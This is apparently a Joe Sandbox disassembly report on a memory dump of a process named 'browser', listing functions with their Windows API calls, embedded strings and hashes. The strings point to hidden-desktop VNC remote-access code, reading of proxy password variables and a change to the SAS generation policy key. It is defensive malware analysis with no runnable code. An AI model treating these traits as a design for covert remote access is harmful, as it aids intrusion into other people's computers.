Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
String ID: ConsoleWindowClass$tty
API String ID: 490048385-1921057836
Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
Instruction ID: 2fa1d676bdb2671f3642ced7efe00b3dcf5a5fad70b4763a9372dee484dbf491
Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
Instruction Fuzzy Hash: 0D416C36718A868ADB309B36E4846A9B7A0FF89B84F945035DE8E43B54DF3CF445CB10

Function 00007FF790C58ED0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF790C58F3A
PtInRect.USER32 ref: 00007FF790C58F4A
EnterCriticalSection.KERNEL32 ref: 00007FF790C58F79
LeaveCriticalSection.KERNEL32 ref: 00007FF790C58F8C
GetCursorPos.USER32 ref: 00007FF790C58FB1
EnterCriticalSection.KERNEL32 ref: 00007FF790C59006
LeaveCriticalSection.KERNEL32 ref: 00007FF790C59037

Strings

^, xrefs: 00007FF790C58FFB

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$CursorEnterLeave$Rect
String ID: ^
API String ID: 2550375211-1590793086
Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
Instruction ID: a1ccd932ebc41aa4f8e45b0a603adde297d68d6246ca94fbe405a826f02a4fb0
Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
Instruction Fuzzy Hash: 9C4118366186818BDB28DF35E5942ADB7B0FB89B94F504236DB5E03B94CF38E464CB10

Function 00007FF790C3A6B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF790C3A716
GetLastError.KERNEL32 ref: 00007FF790C3A720
SystemParametersInfoA.USER32 ref: 00007FF790C3A794
GetLastError.KERNEL32 ref: 00007FF790C3A79E

Strings

HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF790C3A726
HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF790C3A738
HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF790C3A7E7
HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF790C3A7AC

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
API String ID: 2777246624-2146332292
Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
Instruction ID: ba2a4aa0393e3522fd8a99d777c756109fe170abfa6dda954041213bf0c6d518
Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
Instruction Fuzzy Hash: C0419E75A286828AE734EF31B8406A9B3B0FB86748F801136DA8D47B58DE3DF555CB50

Function 00007FF790C3B460 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF790C3B479

Part of subcall function 00007FF790CE9500: _errno.LIBCMT ref: 00007FF790CE9515
Part of subcall function 00007FF790CE9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE9520

_wgetenv.LIBCMT ref: 00007FF790C3B4B0
_wgetenv.LIBCMT ref: 00007FF790C3B4E3
_wgetenv.LIBCMT ref: 00007FF790C3B511

Strings

SOCKS5_PASSWD, xrefs: 00007FF790C3B4A9, 00007FF790C3B4BD
HTTP_PROXY_PASSWORD, xrefs: 00007FF790C3B472, 00007FF790C3B486
SOCKS5_PASSWORD, xrefs: 00007FF790C3B4DC, 00007FF790C3B4F0
CONNECT_PASSWORD, xrefs: 00007FF790C3B50A, 00007FF790C3B51E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _wgetenv$_errno_invalid_parameter_noinfo
String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
API String ID: 1184729097-3964388033
Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
Instruction ID: 8d4b8761cf100e2e2be040e423fca4dd7d807902818f9c575814369d11e55380
Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
Instruction Fuzzy Hash: FF21AB21A3AA4640FEB5FB35D4512F4D2A2AF65740FCC5435EB0D463A2FE2CF951C220

Function 00007FF790C63523 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58timethreadclipboardCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 00007FF790C6352B
ChangeClipboardChain.USER32 ref: 00007FF790C63540
GetCurrentThreadId.KERNEL32 ref: 00007FF790C635B1

Strings

vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF790C635CA
vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF790C63588
vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF790C63564
vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF790C635D3
vncdesktopsink.cpp : WM_DESTROY, xrefs: 00007FF790C635E5

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ChainChangeClipboardCurrentKillThreadTimer
String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 3622578367-539335655
Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction ID: bc57a862b868c05ccf9f575a52c776f2e1e4c7fdf349b6d0e0dcf3f2b9331df9
Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction Fuzzy Hash: EF216BA6A2898392F67DFB30A9441F5E3A1FF45700FC85432C61E46291DE3CF4A49220

Function 00007FF790C43BE0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF790C43C1F
RegOpenKeyExA.ADVAPI32 ref: 00007FF790C43C48
RegSetValueExA.ADVAPI32 ref: 00007FF790C43C81
RegCloseKey.ADVAPI32 ref: 00007FF790C43C8C
RegCloseKey.ADVAPI32 ref: 00007FF790C43C97

Strings

SoftwareSASGeneration, xrefs: 00007FF790C43C5C
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF790C43BE9
System, xrefs: 00007FF790C43C33

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Close$CreateOpenValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 678895439-3579764778
Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
Instruction ID: 6d3a32f8426cf57763fda7302b60eacac95f2383d0ab93ab49c28e96d8a9a25c
Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
Instruction Fuzzy Hash: 8D112C72A28B4286EB609B34F84465AF7B4FB84788F801135E68D43B68DF3CE149CF00

Function 00007FF790C43CB0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF790C43CEF
RegOpenKeyExA.ADVAPI32 ref: 00007FF790C43D18
RegDeleteValueA.ADVAPI32 ref: 00007FF790C43D2E
RegCloseKey.ADVAPI32 ref: 00007FF790C43D39
RegCloseKey.ADVAPI32 ref: 00007FF790C43D44

Strings

SoftwareSASGeneration, xrefs: 00007FF790C43D27
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF790C43CB9
System, xrefs: 00007FF790C43D03

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Close$CreateDeleteOpenValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 2881815620-3579764778
Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
Instruction ID: 65f2e9b320303255acc9a7580fcca9b020cfaef3ab1eeaf7d6eed4c056f082af
Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
Instruction Fuzzy Hash: C9010032A28B4682DB60EB35F84456AF7B5FB84794F802135EA8D47B64DF3CE149CB10

Function 00007FF790CE9ABC Relevance: 13.6, APIs: 9, Instructions: 142COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CE9AF3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE9AFF
_errno.LIBCMT ref: 00007FF790CE9B5A
_errno.LIBCMT ref: 00007FF790CE9B66
_errno.LIBCMT ref: 00007FF790CE9B9A
malloc.LIBCMT ref: 00007FF790CE9BFA
_errno.LIBCMT ref: 00007FF790CE9C1A
_errno.LIBCMT ref: 00007FF790CE9C76
free.LIBCMT ref: 00007FF790CE9C8E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfofreemalloc
String ID:
API String ID: 3646291181-0
Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
Instruction ID: 7ead286aec5f03d77cde233b8cff03eaf289737c415f762752a2bf885aa9da21
Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
Instruction Fuzzy Hash: 92518122A286428AE730BB7594443EDB6E0EF467A4F944631EA1E077C6DF7CF8419721

Function 00007FF790CEAD6C Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF790CEAD95

Part of subcall function 00007FF790CF77D0: _amsg_exit.LIBCMT ref: 00007FF790CF77FA

DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEADC8
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEADE6
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEAE26
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEAE40
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEAE50
_initterm.LIBCMT ref: 00007FF790CEAE90
_initterm.LIBCMT ref: 00007FF790CEAEA3
ExitProcess.KERNEL32 ref: 00007FF790CEAEDC

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3873167975-0
Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction ID: 90bccf218f6e00f8edf6f7b271917d62dcd825a2f1bf0a46ef53c5f0732cd294
Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction Fuzzy Hash: 89419121A3DA4285E630BB35E855279F2A4BF89784F841034EA4E437A5EF3CF8548720

Function 00007FF790CF4BE4 Relevance: 13.6, APIs: 9, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CF4C43
_errno.LIBCMT ref: 00007FF790CF4C79
_errno.LIBCMT ref: 00007FF790CF4C87
_errno.LIBCMT ref: 00007FF790CF4C90
_errno.LIBCMT ref: 00007FF790CF4CD1
_errno.LIBCMT ref: 00007FF790CF4CDB
_errno.LIBCMT ref: 00007FF790CF4CFE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF4D09

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
Instruction ID: e34140b512bafa15ea1cf6bbd7c1083c85a9e4e876cc3fd8abeb35b6fc4fbcaa
Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
Instruction Fuzzy Hash: C231712592875298EA307B7694211ECF690AF97BA0FD44632EB5C437D5DF2CF500C322

Function 00007FF790C47AF0 Relevance: 13.5, APIs: 9, Instructions: 36fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF790C47B0E
CloseHandle.KERNEL32 ref: 00007FF790C47B18
CloseHandle.KERNEL32 ref: 00007FF790C47B22
CloseHandle.KERNEL32 ref: 00007FF790C47B2C
UnmapViewOfFile.KERNEL32 ref: 00007FF790C47B3B
UnmapViewOfFile.KERNEL32 ref: 00007FF790C47B4A
CloseHandle.KERNEL32 ref: 00007FF790C47B59
CloseHandle.KERNEL32 ref: 00007FF790C47B68
DeleteCriticalSection.KERNEL32 ref: 00007FF790C47B72

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
String ID:
API String ID: 4242051881-0
Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
Instruction ID: 060fed1668ab7005fe499445b920f7de4e6354b3fe8ba6f7cb0e45dd2fc93f17
Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
Instruction Fuzzy Hash: F611BE26A26A0686EF64AF75D954178E3B4FF85F49F841135C90E43364CF2DF485C360

Function 00007FF790C54CDB Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-3977938048
Opcode ID: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
Instruction ID: 02ce5e0098dc16c3e358ca18e8dbea4c64ccde0aeb09dabc6fb6c6924822ea23
Opcode Fuzzy Hash: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
Instruction Fuzzy Hash: 98C1C226A2C69185E770AB35C4587FEABA1EF86B48F984131DA4C477E5CF38F481C760

